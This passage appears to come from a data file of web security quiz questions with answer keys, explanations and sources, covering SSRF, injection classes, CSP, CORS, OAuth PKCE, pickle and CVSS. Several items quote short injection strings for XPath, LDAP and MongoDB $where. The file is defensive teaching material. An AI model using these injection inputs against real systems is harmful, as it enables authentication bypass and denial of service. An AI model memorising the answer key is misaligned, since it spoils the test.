    explanation: 'Azure IMDS at 169.254.169.254 mandates the literal `Metadata: true` header. Microsoft\'s documentation calls this out as the principal SSRF mitigation, plus IP/route restrictions inside guests.',
    distractorRationale: { 1: 'Bearer auth is not the IMDS check.', 2: 'CSRF tokens are not used here.', 3: 'Cookies are not used.' },
    source: { name: 'Microsoft Learn — Azure Instance Metadata Service', url: 'https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service' },
  },

  {
    id: 'web-058', topic: 'web', subtopic: 'ssrf-dns-rebinding', difficulty: 'senior',
    question: 'An app fetches a user-supplied URL with strict allow-listing of resolved IPs at request time. The attacker still pivots internally. Which technique?',
    choices: ['DNS rebinding — the attacker\'s domain returns a public IP on first resolution (passing the allow-list check), then a private IP on second resolution (used for the actual fetch). The fix is to resolve once, pin the IP, and perform the fetch against that IP, not re-resolve', 'A CRLF injection', 'A subdomain takeover', 'A WebSocket hijack'],
    correctIndex: 0,
    explanation: 'DNS rebinding attacks exploit the gap between the validation resolution and the real request resolution. Mitigation: resolve once, pin the IP for the fetch (or use a vetted HTTP client that does single-resolution). PortSwigger and OWASP detail variants.',
    distractorRationale: { 1: 'CRLF injects headers.', 2: 'Subdomain takeover is a DNS hygiene issue.', 3: 'WebSocket hijack is an Origin-trust issue.' },
    source: { name: 'PortSwigger — DNS rebinding research', url: 'https://portswigger.net/web-security/ssrf' },
  },

  {
    id: 'web-059', topic: 'web', subtopic: 'esi-injection', difficulty: 'senior',
    question: 'A reverse proxy (Akamai, Varnish, Squid) processes ESI (Edge-Side Includes) tags in upstream responses. An attacker injects `<esi:include src="..."/>` into a reflected field. What is the impact?',
    choices: ['ESI injection — the proxy executes the include directive, fetching attacker-chosen URLs server-side (SSRF), reading internal endpoints, leaking cookies via XSLT, or exfiltrating data through the cache. Mitigation: never enable ESI processing on responses containing untrusted user input, or strip ESI tags', 'A clickjacking', 'A WebAuthn bypass', 'A SAML XSW'],
    correctIndex: 0,
    explanation: 'ESI processors evaluate tags on outgoing responses, before the response leaves the proxy. Injecting ESI tags via reflected user input gains SSRF at the edge. GoSecure\'s research and the Akamai/Varnish docs are canonical references.',
    distractorRationale: { 1: 'Clickjacking uses iframes.', 2: 'WebAuthn is FIDO-related.', 3: 'XSW is SAML signature.' },
    source: { name: 'OWASP — Edge Side Includes (ESI) Injection', url: 'https://owasp.org/www-community/vulnerabilities/Server-Side_Includes_(SSI)_Injection' },
  },

  {
    id: 'web-060', topic: 'web', subtopic: 'xpath-injection', difficulty: 'senior',
    question: 'An app authenticates by querying an XML user store: `//user[name=\'$user\' and pass=\'$pass\']`. A user submits `\' or \'1\'=\'1` as password. What happens?',
    choices: ['XPath injection — the query becomes `//user[name=\'admin\' and pass=\'\' or \'1\'=\'1\']`, returning all users. Mitigation: use parameterised XPath APIs or escape special characters', 'A SAML XSW', 'A buffer overflow', 'An ARP spoof'],
    correctIndex: 0,
    explanation: 'XPath shares SQLi-shaped issues with concatenation-based query construction. OWASP\'s XPath testing guide describes detection and parameterised alternatives.',
    distractorRationale: { 1: 'XSW is signature wrapping.', 2: 'No memory corruption involved.', 3: 'ARP is L2.' },
    source: { name: 'OWASP — Testing for XPath Injection', url: 'https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/09-Testing_for_XPath_Injection' },
  },

  {
    id: 'web-061', topic: 'web', subtopic: 'ldap-injection', difficulty: 'senior',
    question: 'An LDAP-based login forms the filter as `(&(uid=$user)(userPassword=$pass))`. A user submits `*)(uid=*))(|(uid=*` as username. What does this enable?',
    choices: ['LDAP filter injection — closing the original filter and injecting attacker-controlled clauses, often allowing authentication bypass. Mitigation: use parameterised LDAP APIs (e.g., escape per RFC 4515) and avoid concatenation', 'A CSRF', 'A clickjacking', 'A SQL injection'],
    correctIndex: 0,
    explanation: 'LDAP injection is the LDAP-side analogue of SQLi. The OWASP testing guide and OWASP LDAP Injection Prevention Cheat Sheet describe detection and proper parameterisation.',
    distractorRationale: { 1: 'CSRF is request forgery.', 2: 'Clickjacking is iframe-based.', 3: 'SQLi targets relational DBs.' },
    source: { name: 'OWASP LDAP Injection Prevention Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html' },
  },

  {
    id: 'web-062', topic: 'web', subtopic: 'nosql-where-injection', difficulty: 'senior',
    question: 'A MongoDB query passes user input into `$where: "this.username == \'" + user + "\'"`. What attack succeeds and what is the fix?',
    choices: ['JavaScript injection inside $where, since the operator evaluates server-side JS — `\'; while(1){}; //` causes DoS, and arbitrary expressions can leak data. Mitigation: avoid $where entirely; use direct field equality with `db.users.findOne({username: user})`', 'A path traversal', 'A clickjacking', 'A subdomain takeover'],
    correctIndex: 0,
    explanation: 'MongoDB\'s $where executes the supplied JS expression in the database\'s scripting context. PortSwigger and MongoDB official guidance both flag this as high-risk and discourage use of $where entirely.',
    distractorRationale: { 1: 'Traversal is filesystem.', 2: 'Clickjacking is iframe.', 3: 'Subdomain takeover is DNS.' },
    source: { name: 'MongoDB — $where operator security note', url: 'https://www.mongodb.com/docs/manual/reference/operator/query/where/' },
  },

  {
    id: 'web-063', topic: 'web', subtopic: 'csp-strict-dynamic', difficulty: 'senior',
    question: 'Google\'s "strict CSP" recommendation is which policy shape?',
    choices: ['`script-src \'nonce-...\' \'strict-dynamic\' \'unsafe-inline\' http: https:` — using a per-request nonce plus `strict-dynamic` so any script trusted by a nonce can load further scripts; `unsafe-inline` and HTTP fallbacks are present for legacy browsers but ignored by modern ones when nonce is present', 'Disable CSP entirely', 'Use Content-Type only', 'Use frame-options instead'],
    correctIndex: 0,
    explanation: 'csp-evaluator.withgoogle.com recommends nonce + strict-dynamic as the most robust modern policy. Older directives become inert when modern keywords are present, providing graceful degradation. OWASP\'s CSP cheat sheet aligns with this guidance.',
    distractorRationale: { 1: 'Disabling CSP removes the control.', 2: 'Content-Type is unrelated to script policy.', 3: 'frame-options handles framing, not scripts.' },
    source: { name: 'OWASP Content Security Policy Cheat Sheet', url: 'https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html' },
  },

  {
    id: 'web-064', topic: 'web', subtopic: 'sri', difficulty: 'senior',
    question: 'You serve a JS bundle from a third-party CDN. What HTML attribute mitigates a CDN compromise?',
    choices: ['`integrity="sha384-..."` (Subresource Integrity) on the `<script>` tag — browsers verify the fetched bundle\'s hash matches and refuse to execute mismatched content. Pair with `crossorigin="anonymous"`', 'rel="noopener"', 'sandbox', 'referrerpolicy'],
    correctIndex: 0,
    explanation: 'SRI provides a tampering-detection guarantee on third-party resources. Used widely on font/script CDNs. MDN and the W3C SRI spec describe the syntax and the required CORS attributes.',
    distractorRationale: { 1: 'noopener is for window.opener safety.', 2: 'sandbox is iframe-specific.', 3: 'referrerpolicy controls Referer.' },
    source: { name: 'MDN — Subresource Integrity', url: 'https://developer.mozilla.org/en-US/docs/Web/Security/Subresource_Integrity' },
  },

  {
    id: 'web-065', topic: 'web', subtopic: 'cors-null-origin', difficulty: 'senior',
    question: 'An API responds with `Access-Control-Allow-Origin: null` and `Allow-Credentials: true`. Why is `null` a problematic origin to trust?',
    choices: ['Several browser contexts (data: URLs, sandboxed iframes, file://) produce a `null` Origin, so any attacker who can render in such a context can claim Origin: null and access credentialed responses', 'It is the default safe value', 'It is reserved by the spec to mean same-origin', 'It is treated as 127.0.0.1'],
    correctIndex: 0,
    explanation: '`null` Origin is produced by sandboxed iframes (`<iframe sandbox>`), data: URLs, redirected fetches, and some other contexts. Trusting it for credentialed responses lets an attacker abuse a sandboxed iframe to act as an authorised origin. PortSwigger and OWASP CORS cheat sheet flag this.',
    distractorRationale: { 1: 'It is not a default value.', 2: 'Same-origin is the matching scheme/host/port.', 3: 'It is not 127.0.0.1.' },
    source: { name: 'PortSwigger Web Security Academy — CORS (null origin)', url: 'https://portswigger.net/web-security/cors' },
  },

  {
    id: 'web-066', topic: 'web', subtopic: 'jsonp-risks', difficulty: 'senior',
    question: 'JSONP endpoints persist on legacy APIs. What is the senior framing of their security posture?',
    choices: ['JSONP returns executable JavaScript; once embedded via `<script src=...>`, the response runs in the embedding origin\'s context. JSONP endpoints leak any data they expose to any origin that loads them, and act as gadgets for CSP bypass when their origin is on a script-src allow-list. Recommendation: deprecate JSONP, use CORS', 'JSONP is more secure than fetch()', 'JSONP enforces SameSite', 'JSONP requires WebAuthn'],
    correctIndex: 0,
    explanation: 'JSONP\'s security is "data is published as code", which contradicts the SOP for sensitive data. CORS is the modern alternative. OWASP\'s deprecated controls page and many CSP-bypass papers reference JSONP.',
    distractorRationale: { 1: 'fetch + CORS is more secure.', 2: 'SameSite is a cookie property.', 3: 'WebAuthn is unrelated.' },
    source: { name: 'OWASP — JSONP and JSON Hijacking guidance', url: 'https://owasp.org/www-community/attacks/JSON_Hijacking' },
  },

  {
    id: 'web-067', topic: 'web', subtopic: 'webauthn', difficulty: 'senior',
    question: 'WebAuthn / FIDO2 protects against phishing because of which property?',
    choices: ['The signed assertion is bound to the verifying server\'s origin (the relying party ID). Even if the user is tricked into typing on attacker.com, the authenticator refuses to sign because the origin does not match — phishing-resistant by design', 'It uses 6-digit OTPs', 'It uses static passwords', 'It runs over UDP'],
    correctIndex: 0,
    explanation: 'WebAuthn\'s phishing resistance comes from origin binding: the browser passes the validated origin to the authenticator, and the authenticator scopes its signed response to that origin. A phishing site cannot forge this. The W3C WebAuthn spec and FIDO Alliance materials describe the model.',
    distractorRationale: { 1: 'OTPs are not phishing-resistant.', 2: 'Static passwords are highly phishable.', 3: 'WebAuthn is over HTTPS, not UDP.' },
    source: { name: 'W3C — Web Authentication: An API for accessing Public Key Credentials', url: 'https://www.w3.org/TR/webauthn-2/' },
  },

  {
    id: 'web-068', topic: 'web', subtopic: 'pkce', difficulty: 'senior',
    question: 'OAuth 2.0 public clients (mobile/SPA) must use PKCE. Which problem does PKCE specifically solve?',
    choices: ['Authorisation code interception — the attacker who intercepts the code (e.g., via a malicious app on the device) cannot exchange it for a token without the original code_verifier known only to the legitimate client. PKCE adds a verifier-bound exchange step', 'It encrypts the access token', 'It rotates client secrets', 'It enforces TLS'],
    correctIndex: 0,
    explanation: 'RFC 7636 (PKCE) prevents authorisation-code interception attacks against public clients that cannot store a client secret safely. The verifier/code_challenge mechanism binds the code to the client that initiated the flow.',
    distractorRationale: { 1: 'Token encryption is separate.', 2: 'Public clients have no client secret.', 3: 'TLS is independent.' },
    source: { name: 'IETF RFC 7636 — Proof Key for Code Exchange', url: 'https://datatracker.ietf.org/doc/html/rfc7636' },
  },

  {
    id: 'web-069', topic: 'web', subtopic: 'python-pickle', difficulty: 'senior',
    question: 'A Python web app deserialises data using `pickle.loads()` from user-controlled input. What is the senior writeup?',
    choices: ['pickle is unsafe for untrusted data — `__reduce__` lets a serialised object define arbitrary code to run on deserialisation, yielding RCE. Recommendation: use safe formats (JSON, MessagePack) for untrusted input; pickle should only be used with trusted sources, ideally with cryptographic signing', 'pickle.loads is safe by default', 'pickle requires HTTPS', 'pickle uses XML'],
    correctIndex: 0,
    explanation: 'Python\'s pickle module is documented as unsafe for untrusted data. Many real-world RCEs (Celery, ML model loaders) trace back to pickle on attacker input. The Python docs explicitly warn against this use.',
    distractorRationale: { 1: 'pickle.loads is explicitly unsafe.', 2: 'Transport is irrelevant.', 3: 'pickle is binary, not XML.' },
    source: { name: 'Python documentation — pickle (security warning)', url: 'https://docs.python.org/3/library/pickle.html' },
  },

  {
    id: 'web-070', topic: 'web', subtopic: 'reflected-fd', difficulty: 'senior',
    question: 'Reflected File Download (RFD) is a class of attack where:',
    choices: ['Trusted domains serve attacker-controlled content with a forced filename (via Content-Disposition or URL path tricks); the user double-clicks the downloaded file and runs malicious commands appearing to come from the trusted domain. Defence: strict Content-Disposition with filename; sanitise reflected content; never rely on filename from URL', 'A CSRF on file upload', 'An XXE in OOXML', 'A buffer overflow in PDFs'],
    correctIndex: 0,
    explanation: 'RFD was popularised by Oren Hafif (BlackHat 2014). Trusted-origin downloads of attacker-controlled content can deceive users into trusting the file. Mitigations are documented in OWASP and various vendor advisories.',
    distractorRationale: { 1: 'CSRF is request forgery.', 2: 'XXE is XML external entities.', 3: 'PDF overflow is a parser bug.' },
    source: { name: 'Oren Hafif — Reflected File Download research / OWASP RFD reference', url: 'https://owasp.org/www-community/vulnerabilities/Reflected_File_Download' },
  },

  {
    id: 'web-071', topic: 'web', subtopic: 'samesite-modes', difficulty: 'senior',
    question: 'Browsers default many cookies to `SameSite=Lax` if the attribute is unset. What is the difference between `Lax` and `Strict` for a session cookie?',
    choices: ['Lax sends the cookie on top-level GET navigations from external sites; Strict never sends the cookie on cross-site requests at all. For high-value flows (banking), Strict is preferred — the user may need to re-login when arriving from a search result, but the cross-site CSRF surface is zero', 'They are identical', 'Strict allows all subresource requests', 'Lax disables HttpOnly'],
    correctIndex: 0,
    explanation: 'SameSite=Strict eliminates cross-site cookie attachment entirely. Lax preserves usability by allowing top-level GET navigations. RFC6265bis and MDN document the modes; OWASP recommends choosing per-flow risk.',
    distractorRationale: { 1: 'They differ.', 2: 'Strict actually blocks more requests.', 3: 'HttpOnly is independent.' },
    source: { name: 'MDN — Set-Cookie (SameSite)', url: 'https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Set-Cookie#samesitesamesite-value' },
  },

  {
    id: 'web-072', topic: 'web', subtopic: 'http2-rapid-reset', difficulty: 'senior',
    question: 'CVE-2023-44487 (HTTP/2 Rapid Reset) is which kind of attack?',
    choices: ['A DoS leveraging the HTTP/2 protocol\'s stream cancellation: an attacker opens many streams and cancels them rapidly, causing extreme server-side resource use without paying network cost. Mitigations are server patches and tuning maximum concurrent streams / cancellation rates', 'A SQL injection', 'A CSRF', 'An XSS'],
    correctIndex: 0,
    explanation: 'Rapid Reset abused HTTP/2\'s asymmetric cost: cheap cancellations vs expensive server-side stream setup. Cloudflare, AWS and Google detailed the technique in joint disclosures and pushed protocol-level mitigations.',
    distractorRationale: { 1: 'Not a DB injection.', 2: 'Not request forgery.', 3: 'Not a script execution issue.' },
    source: { name: 'Cloudflare — HTTP/2 Rapid Reset disclosure (CVE-2023-44487)', url: 'https://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/' },
  },

  {
    id: 'web-073', topic: 'web', subtopic: 'api-bola', difficulty: 'senior',
    question: 'Which OWASP API Security Top 10 category covers the case where any authenticated user can access another user\'s object by changing the ID in the URL?',
    choices: ['API1:2023 — Broken Object Level Authorization (BOLA), the API equivalent of IDOR. The Top 10 lists it as the most prevalent and high-impact API issue', 'API3 — Mass Assignment', 'API8 — Security Misconfiguration', 'API10 — Unsafe Consumption of APIs'],
    correctIndex: 0,
    explanation: 'OWASP API Security Top 10 places BOLA at #1. The category combines what was traditionally called IDOR with the typical API-shaped resource access pattern.',
    distractorRationale: { 1: 'API3 covers binding/over-posting issues.', 2: 'API8 is hardening.', 3: 'API10 covers risks consuming third-party APIs.' },
    source: { name: 'OWASP API Security Top 10 — API1:2023 BOLA', url: 'https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/' },
  },

  {
    id: 'web-074', topic: 'web', subtopic: 'cwe', difficulty: 'senior',
    question: 'A senior pentester is asked to map a finding to a standard weakness identifier. Which standard provides numeric IDs (CWE-79 for XSS, CWE-89 for SQLi, etc.) and is referenced by NVD CVEs?',
    choices: ['MITRE\'s Common Weakness Enumeration (CWE) — used by NVD/CVE entries to classify the underlying weakness type. Senior reports often cite CWE alongside CVSS for clear, vendor-neutral categorisation', 'OWASP Top 10 only', 'PCI DSS only', 'NIST CSF only'],
    correctIndex: 0,
    explanation: 'CWE is the canonical weakness taxonomy. NVD links CVEs to CWE IDs. The CWE Top 25 is also a widely-referenced list. OWASP, PCI, and NIST CSF are different abstraction levels.',
    distractorRationale: { 1: 'Top 10 is awareness, not numeric weaknesses.', 2: 'PCI DSS is a compliance standard.', 3: 'NIST CSF is a framework.' },
    source: { name: 'MITRE — Common Weakness Enumeration (CWE)', url: 'https://cwe.mitre.org/' },
  },

  {
    id: 'web-075', topic: 'web', subtopic: 'cvss', difficulty: 'senior',
    question: 'A vulnerability has CVSS 3.1 Base 8.1 (High) but Environmental score 5.4 (Medium) due to mitigating context. Which value should a senior pentester emphasise in the executive summary?',
    choices: ['Both — Base reflects the inherent severity, Environmental reflects the actual risk in this client\'s context. Reporting only one hides part of the picture; reporting both with brief explanation lets stakeholders compare against industry baselines and prioritise locally', 'Only Base; Environmental is for vendors', 'Only Environmental; Base is academic', 'Only the temporal score'],
    correctIndex: 0,
    explanation: 'FIRST.org\'s CVSS 3.1 specification documents the three metric groups (Base/Temporal/Environmental). Senior reports communicate inherent vs contextual severity to drive prioritisation discussions.',
    distractorRationale: { 1: 'Environmental is for any consumer.', 2: 'Base is industry comparable.', 3: 'Temporal alone misses environment.' },
    source: { name: 'FIRST — Common Vulnerability Scoring System v3.1 Specification', url: 'https://www.first.org/cvss/v3.1/specification-document' },
  },
];
